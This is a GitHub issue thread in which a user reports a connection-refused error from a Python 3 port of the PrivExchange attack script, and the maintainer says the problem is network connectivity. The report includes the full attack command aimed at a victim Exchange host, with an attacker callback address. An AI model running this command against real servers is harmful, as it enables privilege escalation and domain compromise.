### ISSUE TITLE
Connection Refused Error using PrivExchange.py script

### ISSUE THREAD

**Issue by k1epto** [dirkjanm/PrivExchange#18]
after fixing the privexchange.py to use python3 (using the 2to3 tool), I'm still getting a connection refused error (which I was getting before I adjusted the 1 line to work with py3)

please advise...

`python3 privexchange.py -u username -d domain.local -ah attacker.ip --attacker-page / victim.ip`
--
`INFO: Using attacker URL: http://10.10.14.24/
Traceback (most recent call last):
  File "privexchange.py", line 225, in <module>
    main()
  File "privexchange.py", line 140, in main
    session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
  File "/usr/lib/python3.7/http/client.py", line 1252, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "/usr/lib/python3.7/http/client.py", line 1298, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "/usr/lib/python3.7/http/client.py", line 1247, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "/usr/lib/python3.7/http/client.py", line 1026, in _send_output
    self.send(msg)
  File "/usr/lib/python3.7/http/client.py", line 966, in send
    self.connect()
  File "/usr/lib/python3.7/http/client.py", line 1414, in connect
    super().connect()
  File "/usr/lib/python3.7/http/client.py", line 938, in connect
    (self.host,self.port), self.timeout, self.source_address)
  File "/usr/lib/python3.7/socket.py", line 727, in create_connection
    raise err
  File "/usr/lib/python3.7/socket.py", line 716, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused`

**Comment by dirkjanm** [comment]
This is a connection error from your host to the Exchange host/IP you specified. Whatever the error is here it's unrelated to the script.

**Comment by k1epto** [comment]
> This is a connection error from your host to the Exchange host/IP you specified. Whatever the error is here it's unrelated to the script.

That's BS, it's clearly a bug in your code that you should fix.

**Comment by trolliama** [comment]
i had the same issue
